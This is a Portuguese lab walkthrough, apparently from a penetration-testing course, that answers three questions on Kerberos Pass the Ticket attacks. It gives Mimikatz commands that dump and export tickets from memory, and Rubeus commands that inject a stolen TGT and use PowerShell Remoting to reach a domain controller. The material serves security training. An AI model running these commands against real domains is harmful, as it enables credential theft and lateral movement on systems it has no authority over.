# Questions
1. Conecte-se à máquina de destino usando RDP e as credenciais fornecidas. Exporte todos os tickets presentes no computador. Quantos tickets de usuário (TGT) você coletou
* Podemos coletar todos os tickets de um sistema usando o `Mimikatz` com o módulo `sekurlsa::tickets /export`
{% code lineNumbers="true" %}
```
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exii
dir *.kirbi
```
{% endcode %}
***
2. Use o TGT de John para realizar um ataque Pass the Ticket e recuperar a flag da pasta compartilhada \DC01.inlanefreight.htb\john
* Vamos importar o ticket para a sessão atual usando o `.kirbi` arquivo do disco.
```
Rubeus.exe ptt /ticket:[0;944d6]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi
```
***
3. Use o TGT de John para realizar um ataque Pass the Ticket e conectar-se ao DC01 usando o PowerShell Remoting. Leia o sinalizador de C:\john\john.txt
**Rubeus - PowerShell Remoting with Pass the Ticket**
* Crie um processo sacrificial com Rubeus
```
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
```
* O comando acima abrirá uma nova janela do cmd. A partir dessa janela, podemos executar o Rubeus para solicitar um novo TGT com a opção `/ptt`de importar o ticket para nossa sessão atual e conectar ao DC usando o PowerShell Remoting.
**Rubeus - Passe o bilhete para movimento lateral**
{% code lineNumbers="true" %}
```
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256: /ptt
powershell
Enter-PSSession -ComputerName DC01
```
{% endcode %}
